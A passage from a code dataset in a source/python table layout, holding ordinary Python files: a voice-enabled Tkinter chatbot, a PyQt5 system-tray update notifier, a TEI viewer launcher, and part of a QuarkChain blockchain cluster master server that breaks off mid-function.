source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
chatbot.py | from chatterbot import ChatBot
from chatterbot.trainers import ListTrainer
from tkinter import *
import pyttsx3 as pp
import speech_recognition as s
import threading
import wikipedia
engine = pp.init()
voices = engine.getProperty('voices')
print(voices)
engine.setProperty('voice', voices[1].id)
def speak(word):
engine.say(word)
engine.runAndWait()
bot = ChatBot(
"My Bot",
logic_adapters=[
{
'import_path': 'chatterbot.logic.BestMatch',
# 'default_response': 'I am sorry, but I do not understand.',
# 'default_response': 'answer_from_bot = wikipedia.summary(query,sentences=4),
'default_response': '0',
'maximum_similarity_threshold': 0.90
}
]
)
convo = [
'hello',
'hi there !',
'hi',
'what is your name?',
'My name is Bot, i am created by ali',
'how are you?',
'I am doing great these days',
'thank you',
'Welcome',
'In which city you live ?',
'I live in peshawar',
'In which language you talk?',
'I mostly talk in English.',
]
trainer = ListTrainer(bot)
# now training the bot with the help of trainer
trainer.train(convo)
# answer = bot.get_response('What is your name?')
# print(answer)
# print("Talk to bot")
# while True:
# query = input()
# if query == 'exit':
# break
# answer = bot.get_response(query)
# print("bot : ",answer)
main = Tk()
main.geometry("500x650")
main.title("My Chat bot")
img = PhotoImage(file="bot.png")
photoL = Label(main, image=img)
photoL.pack(pady=5)
def takeQuery():
sr = s.Recognizer()
sr.pause_threshold = 1
print("your bot is listening try to speak")
with s.Microphone() as m:
try:
audio = sr.listen(m)
query = sr.recognize_google(audio, language='eng-in')
print(query)
textF.delete(0, END)
textF.insert(0, query)
ask_from_bot()
except Exception as e:
print(e)
print("Not recognized")
def ask_from_bot():
query = textF.get()
# try:
answer_from_bot = bot.get_response(query)
if(str(answer_from_bot) != '0'):
# except:
# answer_from_bot = wikipedia.summary(query,sentences=4)
msgs.insert(END, "you : " + query)
msgs.insert(END, "bot : " + str(answer_from_bot))
speak(answer_from_bot)
textF.delete(0, END)
msgs.yview(END)
else:
answer_from_bot = wikipedia.summary(query, sentences=4)
msgs.insert(END, "you : " + query)
msgs.insert(END, "bot : " + str(answer_from_bot))
speak(answer_from_bot)
textF.delete(0, END)
msgs.yview(END)
frame = Frame(main)
sc = Scrollbar(frame)
cs = Scrollbar(frame, orient='horizontal')
msgs = Listbox(frame, width=80, height=20, yscrollcommand=sc.set)
sc.pack(side=RIGHT, fill=Y)
cs.pack(side=BOTTOM, fill=X)
msgs.pack(side=LEFT, fill=BOTH, pady=10)
frame.pack()
# creating text field
textF = Entry(main, font=("Verdana", 20))
textF.pack(fill=X, pady=10)
btn = Button(main, text="Ask from bot", font=("Verdana", 20), command=ask_from_bot)
btn.pack()
def enter_function(event):
btn.invoke()
main.bind('<Return>', enter_function)
def repeatL():
while True:
takeQuery()
t = threading.Thread(target=repeatL)
t.start()
main.mainloop() |
systray.py | import time
from threading import Lock, Thread
from typing import List
from PyQt5.QtCore import QThread, pyqtSignal, QCoreApplication, Qt
from PyQt5.QtGui import QIcon
from PyQt5.QtWidgets import QSystemTrayIcon, QMenu
from bauh import __app_name__
from bauh.core import resource, system
from bauh.core.controller import ApplicationManager
from bauh.core.model import ApplicationUpdate
from bauh.view.qt.about import AboutDialog
from bauh.view.qt.window import ManageWindow
class UpdateCheck(QThread):
signal = pyqtSignal(list)
def __init__(self, manager: ApplicationManager, check_interval: int, parent=None):
super(UpdateCheck, self).__init__(parent)
self.check_interval = check_interval
self.manager = manager
def run(self):
while True:
updates = self.manager.list_updates()
self.signal.emit(updates)
time.sleep(self.check_interval)
class TrayIcon(QSystemTrayIcon):
def __init__(self, locale_keys: dict, manager: ApplicationManager, manage_window: ManageWindow, check_interval: int = 60, update_notification: bool = True):
super(TrayIcon, self).__init__()
self.locale_keys = locale_keys
self.manager = manager
self.icon_default = QIcon(resource.get_path('img/logo.png'))
self.icon_update = QIcon(resource.get_path('img/logo_update.png'))
self.setIcon(self.icon_default)
self.menu = QMenu()
self.action_manage = self.menu.addAction(self.locale_keys['tray.action.manage'])
self.action_manage.triggered.connect(self.show_manage_window)
self.action_about = self.menu.addAction(self.locale_keys['tray.action.about'])
self.action_about.triggered.connect(self.show_about)
self.action_exit = self.menu.addAction(self.locale_keys['tray.action.exit'])
self.action_exit.triggered.connect(lambda: QCoreApplication.exit())
self.setContextMenu(self.menu)
self.manage_window = None
self.dialog_about = None
self.check_thread = UpdateCheck(check_interval=check_interval, manager=self.manager)
self.check_thread.signal.connect(self.notify_updates)
self.check_thread.start()
self.last_updates = set()
self.update_notification = update_notification
self.lock_notify = Lock()
self.activated.connect(self.handle_click)
self.set_default_tooltip()
self.manage_window = manage_window
def set_default_tooltip(self):
self.setToolTip('{} ({})'.format(self.locale_keys['manage_window.title'], __app_name__).lower())
def handle_click(self, reason):
if reason == self.Trigger:
self.show_manage_window()
def verify_updates(self, notify_user: bool = True):
Thread(target=self._verify_updates, args=(notify_user,)).start()
def _verify_updates(self, notify_user: bool):
self.notify_updates(self.manager.list_updates(), notify_user=notify_user)
def notify_updates(self, updates: List[ApplicationUpdate], notify_user: bool = True):
self.lock_notify.acquire()
try:
if len(updates) > 0:
update_keys = {'{}:{}:{}'.format(up.type, up.id, up.version) for up in updates}
new_icon = self.icon_update
if update_keys.difference(self.last_updates):
self.last_updates = update_keys
msg = '{}: {}'.format(self.locale_keys['notification.new_updates'], len(updates))
self.setToolTip(msg)
if self.update_notification and notify_user:
system.notify_user(msg)
else:
self.last_updates.clear()
new_icon = self.icon_default
self.set_default_tooltip()
if self.icon().cacheKey() != new_icon.cacheKey(): # changes the icon if needed
self.setIcon(new_icon)
finally:
self.lock_notify.release()
def show_manage_window(self):
if self.manage_window.isMinimized():
self.manage_window.setWindowState(Qt.WindowNoState)
elif not self.manage_window.isVisible():
self.manage_window.refresh_apps()
self.manage_window.show()
def show_about(self):
if self.dialog_about is None:
self.dialog_about = AboutDialog(self.locale_keys)
if self.dialog_about.isHidden():
self.dialog_about.show()
|
serve_tei_tx_ui.py | import PySimpleGUIQt as sg
import tendon.py.edit_settings as es
from pathlib import Path
import os
import threading
from tendon.py.serve_tei_transcriptions.serve_tei import launch_tei_viewer as launch
# pylint: disable=no-member
def layout(settings: dict):
tei_repo_frame = [
[sg.I(settings['tei_dir'], key='tei_folder'),
sg.FolderBrowse(initial_folder=settings['tei_dir'])]
]
return [
[sg.Frame('TEI Transcription Folder', tei_repo_frame)],
[sg.B('Launch TEI Transcription Viewer', key='launch'), sg.B('Cancel', key='exit')]
]
def set_initial_dir(tei_dir: str):
tei_dir = Path(tei_dir).as_posix()
es.edit_settings('tei_dir', tei_dir)
def kill_server(httpd):
httpd.shutdown()
print('server stopped')
def serve_tei_tx(main_dir, font: tuple, icon):
cwd = Path.cwd().as_posix()
settings = es.get_settings()
window = sg.Window('Launch TEI Transcription Viewer', layout(settings), font=font, icon=icon)
httpd = None
while True:
event, values = window.read()
if event in ['exit', sg.WINDOW_CLOSED, None]:
if httpd:
threading.Thread(target=kill_server, args=[httpd]).start()
break
elif event == 'launch':
if values['tei_folder'] == '':
continue
try:
tei_dir = Path(values['tei_folder'])
except:
continue
if tei_dir.is_file():
tei_dir = tei_dir.parent.as_posix()
else:
tei_dir = tei_dir.as_posix()
set_initial_dir(tei_dir)
httpd = launch(tei_dir, main_dir)
window['launch'].update(disabled=True)
window.close()
os.chdir(cwd)
return False |
master.py | import argparse
import asyncio
import ipaddress
import psutil
import random
import time
from collections import deque
from threading import Thread
from typing import Optional, List, Union, Dict, Tuple
from quarkchain.cluster.miner import Miner, MiningWork, validate_seal
from quarkchain.cluster.p2p_commands import (
CommandOp,
Direction,
GetRootBlockHeaderListRequest,
GetRootBlockListRequest,
)
from quarkchain.cluster.protocol import (
ClusterMetadata,
ClusterConnection,
P2PConnection,
ROOT_BRANCH,
NULL_CONNECTION,
)
from quarkchain.cluster.root_state import RootState
from quarkchain.cluster.rpc import (
AddMinorBlockHeaderResponse,
GetEcoInfoListRequest,
GetNextBlockToMineRequest,
GetUnconfirmedHeadersRequest,
GetAccountDataRequest,
AddTransactionRequest,
AddRootBlockRequest,
AddMinorBlockRequest,
CreateClusterPeerConnectionRequest,
DestroyClusterPeerConnectionCommand,
SyncMinorBlockListRequest,
GetMinorBlockRequest,
GetTransactionRequest,
ArtificialTxConfig,
MineRequest,
GenTxRequest,
GetLogResponse,
GetLogRequest,
ShardStats,
EstimateGasRequest,
GetStorageRequest,
GetCodeRequest,
GasPriceRequest,
GetWorkRequest,
GetWorkResponse,
SubmitWorkRequest,
SubmitWorkResponse,
)
from quarkchain.cluster.rpc import (
ConnectToSlavesRequest,
ClusterOp,
CLUSTER_OP_SERIALIZER_MAP,
ExecuteTransactionRequest,
Ping,
GetTransactionReceiptRequest,
GetTransactionListByAddressRequest,
)
from quarkchain.cluster.simple_network import SimpleNetwork
from quarkchain.config import RootConfig
from quarkchain.env import DEFAULT_ENV
from quarkchain.core import (
Branch,
ShardMask,
Log,
Address,
TransactionReceipt,
MinorBlock,
)
from quarkchain.core import Transaction
from quarkchain.db import PersistentDb
from quarkchain.p2p.p2p_network import P2PNetwork, devp2p_app
from quarkchain.utils import Logger, check, time_ms
from quarkchain.cluster.cluster_config import ClusterConfig
class SyncTask:
""" Given a header and a peer, the task will synchronize the local state
including root chain and shards with the peer up to the height of the header.
"""
def __init__(self, header, peer):
self.header = header
self.peer = peer
self.master_server = peer.master_server
self.root_state = peer.root_state
self.max_staleness = (
self.root_state.env.quark_chain_config.ROOT.MAX_STALE_ROOT_BLOCK_HEIGHT_DIFF
)
async def sync(self):
try:
await self.__run_sync()
except Exception as e:
Logger.log_exception()
self.peer.close_with_error(str(e))
async def __run_sync(self):
"""raise on any error so that sync() will close peer connection"""
if self.__has_block_hash(self.header.get_hash()):
return
# descending height
block_header_chain = [self.header]
while not self.__has_block_hash(block_header_chain[-1].hash_prev_block):
block_hash = block_header_chain[-1].hash_prev_block
height = block_header_chain[-1].height - 1
# abort if we have to download super old blocks
if self.root_state.tip.height - height > self.max_staleness:
Logger.warning(
"[R] abort syncing due to forking at super old block {} << {}".format(
height, self.root_state.tip.height
)
)
return
Logger.info(
"[R] downloading block header list from {} {}".format(
height, block_hash.hex()
)
)
block_header_list = await self.__download_block_headers(block_hash)
Logger.info(
"[R] downloaded headers from peer".format(len(block_header_list))
)
if not self.__validate_block_headers(block_header_list):
# TODO: tag bad peer
raise RuntimeError("Bad peer sending discontinuing block headers")
for header in block_header_list:
if self.__has_block_hash(header.get_hash()):
break
block_header_chain.append(header)
block_header_chain.reverse()
while len(block_header_chain) > 0:
Logger.info(
"[R] syncing from {} {}".format(
block_header_chain[0].height, block_header_chain[0].get_hash().hex()
)
)
block_chain = await self.__download_blocks(block_header_chain[:100])
Logger.info("[R] downloaded {} blocks from peer".format(len(block_chain)))
if len(block_chain) != len(block_header_chain[:100]):
# TODO: tag bad peer
raise RuntimeError("Bad peer missing blocks for headers they have")
for block in block_chain:
await self.__add_block(block)
block_header_chain.pop(0)
def __has_block_hash(self, block_hash):
return self.root_state.contain_root_block_by_hash(block_hash)
def __validate_block_headers(self, block_header_list):
# TODO: check difficulty and other stuff?
consensus_type = self.root_state.env.quark_chain_config.ROOT.CONSENSUS_TYPE
for i in range(len(block_header_list) - 1):
header, prev = block_header_list[i : i + 2]
if header.height != prev.height + 1:
return False
if header.hash_prev_block != prev.get_hash():
return False
validate_seal(header, consensus_type)
return True
async def __download_block_headers(self, block_hash):
request = GetRootBlockHeaderListRequest(
block_hash=block_hash, limit=100, direction=Direction.GENESIS
)
op, resp, rpc_id = await self.peer.write_rpc_request(
CommandOp.GET_ROOT_BLOCK_HEADER_LIST_REQUEST, request
)
return resp.block_header_list
async def __download_blocks(self, block_header_list):
block_hash_list = [b.get_hash() for b in block_header_list]
op, resp, rpc_id = await self.peer.write_rpc_request(
CommandOp.GET_ROOT_BLOCK_LIST_REQUEST,
GetRootBlockListRequest(block_hash_list),
)
return resp.root_block_list
async def __add_block(self, root_block):
start = time.time()
await self.__sync_minor_blocks(root_block.minor_block_header_list)
await self.master_server.add_root_block(root_block)
elapse = time.time() - start
Logger.info(
"[R] syncing root block {} {} took {:.2f} seconds".format(
root_block.header.height, root_block.header.get_hash().hex(), elapse
)
)
async def __sync_minor_blocks(self, minor_block_header_list):
minor_block_download_map = dict()
for m_block_header in minor_block_header_list:
m_block_hash = m_block_header.get_hash()
if not self.root_state.is_minor_block_validated(m_block_hash):
minor_block_download_map.setdefault(m_block_header.branch, []).append(
m_block_hash
)
future_list = []
for branch, m_block_hash_list in minor_block_download_map.items():
slave_conn = self.master_server.get_slave_connection(branch=branch)
future = slave_conn.write_rpc_request(
op=ClusterOp.SYNC_MINOR_BLOCK_LIST_REQUEST,
cmd=SyncMinorBlockListRequest(
m_block_hash_list, branch, self.peer.get_cluster_peer_id()
),
)
future_list.append(future)
result_list = await asyncio.gather(*future_list)
for result in result_list:
if result is Exception:
raise RuntimeError(
"Unable to download minor blocks from root block with exception {}".format(
result
)
)
_, result, _ = result
if result.error_code != 0:
raise RuntimeError("Unable to download minor blocks from root block")
for m_header in minor_block_header_list:
self.root_state.add_validated_minor_block_hash(m_header.get_hash())
class Synchronizer:
""" Buffer the headers received from peer and sync one by one """
def __init__(self):
self.queue = deque()
self.running = False
def add_task(self, header, peer):
self.queue.append((header, peer))
if not self.running:
self.running = True
asyncio.ensure_future(self.__run())
async def __run(self):
while len(self.queue) > 0:
header, peer = self.queue.popleft()
task = SyncTask(header, peer)
await task.sync()
self.running = False
class SlaveConnection(ClusterConnection):
OP_NONRPC_MAP = {}
def __init__(
self, env, reader, writer, master_server, slave_id, shard_mask_list, name=None
):
super().__init__(
env,
reader,
writer,
CLUSTER_OP_SERIALIZER_MAP,
self.OP_NONRPC_MAP,
OP_RPC_MAP,
name=name,
)
self.master_server = master_server
self.id = slave_id
self.shard_mask_list = shard_mask_list
check(len(shard_mask_list) > 0)
asyncio.ensure_future(self.active_and_loop_forever())
def get_connection_to_forward(self, metadata):
""" Override ProxyConnection.get_connection_to_forward()
Forward traffic from slave to peer
"""
if metadata.cluster_peer_id == 0:
return None
peer = self.master_server.get_peer(metadata.cluster_peer_id)
if peer is None:
return NULL_CONNECTION
return peer
def validate_connection(self, connection):
return connection == NULL_CONNECTION or isinstance(connection, P2PConnection)
def has_shard(self, shard_id):
for shard_mask in self.shard_mask_list:
if shard_mask.contain_shard_id(shard_id):
return True
return False
def has_overlap(self, shard_mask):
for local_shard_mask in self.shard_mask_list:
if local_shard_mask.has_overlap(shard_mask):
return True
return False
async def send_ping(self, initialize_shard_state=False):
root_block = (
self.master_server.root_state.get_tip_block()
if initialize_shard_state
else None
)
req = Ping("", [], root_block)
op, resp, rpc_id = await self.write_rpc_request(
op=ClusterOp.PING,
cmd=req,
metadata=ClusterMetadata(branch=ROOT_BRANCH, cluster_peer_id=0),
)
return (resp.id, resp.shard_mask_list)
async def send_connect_to_slaves(self, slave_info_list):
""" Make slave connect to other slaves.
Returns True on success
"""
req = ConnectToSlavesRequest(slave_info_list)
op, resp, rpc_id = await self.write_rpc_request(
ClusterOp.CONNECT_TO_SLAVES_REQUEST, req
)
check(len(resp.result_list) == len(slave_info_list))
for i, result in enumerate(resp.result_list):
if len(result) > 0:
Logger.info(
"Slave {} failed to connect to {} with error {}".format(
self.id, slave_info_list[i].id, result
)
)
return False
Logger.info("Slave {} connected to other slaves successfully".format(self.id))
return True
def close(self):
Logger.info("Lost connection with slave {}".format(self.id))
super().close()
self.master_server.shutdown()
def close_with_error(self, error):
Logger.info("Closing connection with slave {}".format(self.id))
return super().close_with_error(error)
async def add_transaction(self, tx):
request = AddTransactionRequest(tx)
_, resp, _ = await self.write_rpc_request(
ClusterOp.ADD_TRANSACTION_REQUEST, request
)
return resp.error_code == 0
async def execute_transaction(
self, tx: Transaction, from_address, block_height: Optional[int]
):
request = ExecuteTransactionRequest(tx, from_address, block_height)
_, resp, _ = await self.write_rpc_request(
ClusterOp.EXECUTE_TRANSACTION_REQUEST, request
)
return resp.result if resp.error_code == 0 else None
async def get_minor_block_by_hash(self, block_hash, branch):
request = GetMinorBlockRequest(branch, minor_block_hash=block_hash)
_, resp, _ = await self.write_rpc_request(
ClusterOp.GET_MINOR_BLOCK_REQUEST, request
)
if resp.error_code != 0:
return None
return resp.minor_block
async def get_minor_block_by_height(self, height, branch):
request = GetMinorBlockRequest(branch, height=height)
_, resp, _ = await self.write_rpc_request(
ClusterOp.GET_MINOR_BLOCK_REQUEST, request
)
if resp.error_code != 0:
return None
return resp.minor_block
async def get_transaction_by_hash(self, tx_hash, branch):
request = GetTransactionRequest(tx_hash, branch)
_, resp, _ = await self.write_rpc_request(
ClusterOp.GET_TRANSACTION_REQUEST, request
)
if resp.error_code != 0:
return None, None
return resp.minor_block, resp.index
async def get_transaction_receipt(self, tx_hash, branch):
request = GetTransactionReceiptRequest(tx_hash, branch)
_, resp, _ = await self.write_rpc_request(
ClusterOp.GET_TRANSACTION_RECEIPT_REQUEST, request
)
if resp.error_code != 0:
return None
return resp.minor_block, resp.index, resp.receipt
async def get_transactions_by_address(self, address, start, limit):
request = GetTransactionListByAddressRequest(address, start, limit)
_, resp, _ = await self.write_rpc_request(
ClusterOp.GET_TRANSACTION_LIST_BY_ADDRESS_REQUEST, request
)
if resp.error_code != 0:
return None
return resp.tx_list, resp.next
async def get_logs(
self,
branch: Branch,
addresses: List[Address],
topics: List[List[bytes]],
start_block: int,
end_block: int,
) -> Optional[List[Log]]:
request = GetLogRequest(branch, addresses, topics, start_block, end_block)
_, resp, _ = await self.write_rpc_request(
ClusterOp.GET_LOG_REQUEST, request
) # type: GetLogResponse
return resp.logs if resp.error_code == 0 else None
async def estimate_gas(
self, tx: Transaction, from_address: Address
) -> Optional[int]:
request = EstimateGasRequest(tx, from_address)
_, resp, _ = await self.write_rpc_request(
ClusterOp.ESTIMATE_GAS_REQUEST, request
)
return resp.result if resp.error_code == 0 else None
async def get_storage_at(
self, address: Address, key: int, block_height: Optional[int]
) -> Optional[bytes]:
request = GetStorageRequest(address, key, block_height)
_, resp, _ = await self.write_rpc_request(
ClusterOp.GET_STORAGE_REQUEST, request
)
return resp.result if resp.error_code == 0 else None
async def get_code(
self, address: Address, block_height: Optional[int]
) -> Optional[bytes]:
request = GetCodeRequest(address, block_height)
_, resp, _ = await self.write_rpc_request(ClusterOp.GET_CODE_REQUEST, request)
return resp.result if resp.error_code == 0 else None
async def gas_price(self, branch: Branch) -> Optional[int]:
request = GasPriceRequest(branch)
_, resp, _ = await self.write_rpc_request(ClusterOp.GAS_PRICE_REQUEST, request)
return resp.result if resp.error_code == 0 else None
async def get_work(self, branch: Branch) -> Optional[MiningWork]:
request = GetWorkRequest(branch)
_, resp, _ = await self.write_rpc_request(ClusterOp.GET_WORK_REQUEST, request)
get_work_resp = resp # type: GetWorkResponse
if get_work_resp.error_code != 0:
return None
return MiningWork(
get_work_resp.header_hash, get_work_resp.height, get_work_resp.difficulty
)
async def submit_work(
self, branch: Branch, header_hash: bytes, nonce: int, mixhash: bytes
) -> bool:
request = SubmitWorkRequest(branch, header_hash, nonce, mixhash)
_, resp, _ = await self.write_rpc_request(
ClusterOp.SUBMIT_WORK_REQUEST, request
)
submit_work_resp = resp # type: SubmitWorkResponse
return submit_work_resp.error_code == 0 and submit_work_resp.success
# RPC handlers
async def handle_add_minor_block_header_request(self, req):
self.master_server.root_state.add_validated_minor_block_hash(
req.minor_block_header.get_hash()
)
self.master_server.update_shard_stats(req.shard_stats)
self.master_server.update_tx_count_history(
req.tx_count, req.x_shard_tx_count, req.minor_block_header.create_time
)
return AddMinorBlockHeaderResponse(
error_code=0,
artificial_tx_config=self.master_server.get_artificial_tx_config(),
)
OP_RPC_MAP = {
ClusterOp.ADD_MINOR_BLOCK_HEADER_REQUEST: (
ClusterOp.ADD_MINOR_BLOCK_HEADER_RESPONSE,
SlaveConnection.handle_add_minor_block_header_request,
)
}
class MasterServer:
""" Master node in a cluster
It does two things to initialize the cluster:
1. Setup connection with all the slaves in ClusterConfig
2. Make slaves connect to each other
"""
def __init__(self, env, root_state, name="master"):
self.loop = asyncio.get_event_loop()
self.env = env
self.root_state = root_state
self.network = None # will be set by SimpleNetwork
self.cluster_config = env.cluster_config
# branch value -> a list of slave running the shard
self.branch_to_slaves = dict() # type: Dict[int, List[SlaveConnection]]
self.slave_pool = set()
self.cluster_active_future = self.loop.create_future()
self.shutdown_future = self.loop.create_future()
self.name = name
self.artificial_tx_config = ArtificialTxConfig(
target_root_block_time=self.env.quark_chain_config.ROOT.CONSENSUS_CONFIG.TARGET_BLOCK_TIME,
target_minor_block_time=self.env.quark_chain_config.SHARD_LIST[
0
].CONSENSUS_CONFIG.TARGET_BLOCK_TIME,
)
self.synchronizer = Synchronizer()
self.branch_to_shard_stats = dict() # type: Dict[int, ShardStats]
# (epoch in minute, tx_count in the minute)
self.tx_count_history = deque()
self.__init_root_miner()
def __init_root_miner(self):
miner_address = self.env.quark_chain_config.testnet_master_address
async def __create_block():
while True:
is_root, block = await self.get_next_block_to_mine(
address=miner_address, shard_mask_value=0, prefer_root=True
)
if is_root:
return block
await asyncio.sleep(1)
def __get_mining_params():
return {
"target_block_time": self.get_artificial_tx_config().target_root_block_time
}
root_config = self.env.quark_chain_config.ROOT # type: RootConfig
self.root_miner = Miner(
root_config.CONSENSUS_TYPE,
__create_block,
self.add_root_block,
__get_mining_params,
remote=root_config.CONSENSUS_CONFIG.REMOTE_MINE,
)
def __get_shard_size(self):
# TODO: replace it with dynamic size
return self.env.quark_chain_config.SHARD_SIZE
def get_shard_size(self):
return self.__get_shard_size()
def get_artificial_tx_config(self):
return self.artificial_tx_config
def __has_all_shards(self):
""" Returns True if all the shards have been run by at least one node """
return len(self.branch_to_slaves) == self.__get_shard_size() and all(
[len(slaves) > 0 for _, slaves in self.branch_to_slaves.items()]
)
async def __connect(self, ip, port):
""" Retries until success """
Logger.info("Trying to connect {}:{}".format(ip, port))
while True:
try:
reader, writer = await asyncio.open_connection(ip, port, loop=self.loop)
break
except Exception as e:
Logger.info("Failed to connect {} {}: {}".format(ip, port, e))
await asyncio.sleep(
self.env.cluster_config.MASTER.MASTER_TO_SLAVE_CONNECT_RETRY_DELAY
)
Logger.info("Connected to {}:{}".format(ip, port))
return (reader, writer)
async def __connect_to_slaves(self):
""" Master connects to all the slaves """
futures = []
slaves = []
for slave_info in self.cluster_config.get_slave_info_list():
ip = str(ipaddress.ip_address(slave_info.ip))
reader, writer = await self.__connect(ip, slave_info.port)
slave = SlaveConnection(
self.env,
reader,
writer,
self,
slave_info.id,
slave_info.shard_mask_list,
name="{}_slave_{}".format(self.name, slave_info.id),
)
await slave.wait_until_active()
futures.append(slave.send_ping())
slaves.append(slave)
results = await asyncio.gather(*futures)
for slave, result in zip(slaves, results):
# Verify the slave does have the same id and shard mask list as the config file
id, shard_mask_list = result
if id != slave.id:
Logger.error(
"Slave id does not match. expect {} got {}".format(slave.id, id)
)
self.shutdown()
if shard_mask_list != slave.shard_mask_list:
Logger.error(
"Slave {} shard mask list does not match. expect {} got {}".format(
slave.id, slave.shard_mask_list, shard_mask_list
)
)
self.shutdown()
self.slave_pool.add(slave)
for shard_id in range(self.__get_shard_size()):
branch = Branch.create(self.__get_shard_size(), shard_id)
if slave.has_shard(shard_id):
self.branch_to_slaves.setdefault(branch.value, []).append(slave)
async def __setup_slave_to_slave_connections(self):
""" Make slaves connect to other slaves.
Retries until success.
"""
for slave in self.slave_pool:
await slave.wait_until_active()
success = await slave.send_connect_to_slaves(
self.cluster_config.get_slave_info_list()
)
if not success:
self.shutdown()
async def __init_shards(self):
futures = []
for slave in self.slave_pool:
futures.append(slave.send_ping(initialize_shard_state=True))
await asyncio.gather(*futures)
async def __send_mining_config_to_slaves(self, mining):
futures = []
for slave in self.slave_pool:
request = MineRequest(self.get_artificial_tx_config(), mining)
futures.append(slave.write_rpc_request(ClusterOp.MINE_REQUEST, request))
responses = await asyncio.gather(*futures)
check(all([resp.error_code == 0 for _, resp, _ in responses]))
async def start_mining(self):
await self.__send_mining_config_to_slaves(True)
self.root_miner.start()
Logger.warning(
"Mining started with root block time {} s, minor block time {} s".format(
self.get_artificial_tx_config().target_root_block_time,
self.get_artificial_tx_config().target_minor_block_time,
)
)
async def stop_mining(self):
await self.__send_mining_config_to_slaves(False)
self.root_miner.disable()
Logger.warning("Mining stopped")
def get_slave_connection(self, branch):
# TODO: Support forwarding to multiple connections (for replication)
check(len(self.branch_to_slaves[branch.value]) > 0)
return self.branch_to_slaves[branch.value][0]
def __log_summary(self):
for branch_value, slaves in self.branch_to_slaves.items():
Logger.info(
"[{}] is run by slave {}".format(
Branch(branch_value).get_shard_id(), [s.id for s in slaves]
)
)
async def __init_cluster(self):
await self.__connect_to_slaves()
self.__log_summary()
if not self.__has_all_shards():
Logger.error("Missing some shards. Check cluster config file!")
return
await self.__setup_slave_to_slave_connections()
await self.__init_shards()
self.cluster_active_future.set_result(None)
def start(self):
self.loop.create_task(self.__init_cluster())
def start_and_loop(self):
self.start()
try:
self.loop.run_until_complete(self.shutdown_future)
except KeyboardInterrupt:
pass
def wait_until_cluster_active(self):
# Wait until cluster is ready
self.loop.run_until_complete(self.cluster_active_future)
def shutdown(self):
# TODO: May set exception and disconnect all slaves
if not self.shutdown_future.done():
self.shutdown_future.set_result(None)
if not self.cluster_active_future.done():
self.cluster_active_future.set_exception(
RuntimeError("failed to start the cluster")
)
def get_shutdown_future(self):
return self.shutdown_future
async def __create_root_block_to_mine_or_fallback_to_minor_block(self, address):
""" Try to create a root block to mine or fallback to create minor block if failed proof-of-progress """
futures = []
for slave in self.slave_pool:
request = GetUnconfirmedHeadersRequest()
futures.append(
slave.write_rpc_request(
ClusterOp.GET_UNCONFIRMED_HEADERS_REQUEST, request
)
)
responses = await asyncio.gather(*futures)
# Slaves may run multiple copies of the same branch
# branch_value -> HeaderList
shard_id_to_header_list = dict()
for response in responses:
_, response, _ = response
if response.error_code != 0:
return (None, None)
for headers_info in response.headers_info_list:
if headers_info.branch.get_shard_size() != self.__get_shard_size():
Logger.error(
"Expect shard size {} got {}".format(
self.__get_shard_size(),
headers_info.branch.get_shard_size(),
)
)
return (None, None)
height = 0
for header in headers_info.header_list:
# check headers are ordered by height
check(height == 0 or height + 1 == header.height)
height = header.height
# Filter out the ones unknown to the master
if not self.root_state.is_minor_block_validated(header.get_hash()):
break
shard_id_to_header_list.setdefault(
headers_info.branch.get_shard_id(), []
).append(header)
header_list = []
# check proof of progress
shard_ids_to_check = self.env.quark_chain_config.get_initialized_shard_ids_before_root_height(
self.root_state.tip.height + 1
)
for shard_id in shard_ids_to_check:
headers = shard_id_to_header_list.get(shard_id, [])
header_list.extend(headers)
if len(headers) < self.env.quark_chain_config.PROOF_OF_PROGRESS_BLOCKS:
# Fallback to create minor block
block = await self.__get_minor_block_to_mine(
Branch.create(self.__get_shard_size(), shard_id), address
)
return (None, None) if not block else (False, block)
return (True, self.root_state.create_block_to_mine(header_list, address))
async def __get_minor_block_to_mine(self, branch, address):
request = GetNextBlockToMineRequest(
branch=branch,
address=address.address_in_branch(branch),
artificial_tx_config=self.get_artificial_tx_config(),
)
slave = self.get_slave_connection(branch)
_, response, _ = await slave.write_rpc_request(
ClusterOp.GET_NEXT_BLOCK_TO_MINE_REQUEST, request
)
return response.block if response.error_code == 0 else None
async def get_next_block_to_mine(
self, address, shard_mask_value=0, prefer_root=False, randomize_output=True
):
""" Returns (is_root_block, block)
shard_mask_value = 0 means considering root chain and all the shards
"""
# Mining old blocks is useless
if self.synchronizer.running:
return None, None
if prefer_root and shard_mask_value == 0:
return await self.__create_root_block_to_mine_or_fallback_to_minor_block(
address
)
shard_mask = None if shard_mask_value == 0 else ShardMask(shard_mask_value)
futures = []
# Collect EcoInfo from shards
for slave in self.slave_pool:
if shard_mask and not slave.has_overlap(shard_mask):
continue
request = GetEcoInfoListRequest()
futures.append(
slave.write_rpc_request(ClusterOp.GET_ECO_INFO_LIST_REQUEST, request)
)
responses = await asyncio.gather(*futures)
# Slaves may run multiple copies of the same branch
# We only need one EcoInfo per branch
# branch_value -> EcoInfo
branch_value_to_eco_info = dict()
for response in responses:
_, response, _ = response
if response.error_code != 0:
return None, None
for eco_info in response.eco_info_list:
branch_value_to_eco_info[eco_info.branch.value] = eco_info
root_coinbase_amount = 0
for branch_value, eco_info in branch_value_to_eco_info.items():
root_coinbase_amount += eco_info.unconfirmed_headers_coinbase_amount
root_coinbase_amount = root_coinbase_amount // 2
branch_value_with_max_eco = 0 if shard_mask is None else None
max_eco = root_coinbase_amount / self.root_state.get_next_block_difficulty()
dup_eco_count = 1
block_height = 0
for branch_value, eco_info in branch_value_to_eco_info.items():
if shard_mask and not shard_mask.contain_branch(Branch(branch_value)):
continue
# TODO: Obtain block reward and tx fee
eco = eco_info.coinbase_amount / eco_info.difficulty
if (
branch_value_with_max_eco is None
or eco > max_eco
or (
eco == max_eco
and branch_value_with_max_eco > 0
and block_height > eco_info.height
)
):
branch_value_with_max_eco = branch_value
max_eco = eco
dup_eco_count = 1
block_height = eco_info.height
elif eco == max_eco and randomize_output:
# The current block with max eco has smaller height, mine the block first
# This should be only used during bootstrap.
if branch_value_with_max_eco > 0 and block_height < eco_info.height:
continue
dup_eco_count += 1
if random.random() < 1 / dup_eco_count:
branch_value_with_max_eco = branch_value
max_eco = eco
if branch_value_with_max_eco == 0:
return await self.__create_root_block_to_mine_or_fallback_to_minor_block(
address
)
block = await self.__get_minor_block_to_mine(
Branch(branch_value_with_max_eco), address
)
return (None, None) if not block else (False, block)
async def get_account_data(self, address: Address):
""" Returns a dict where key is Branch and value is AccountBranchData """
futures = []
for slave in self.slave_pool:
request = GetAccountDataRequest(address)
futures.append(
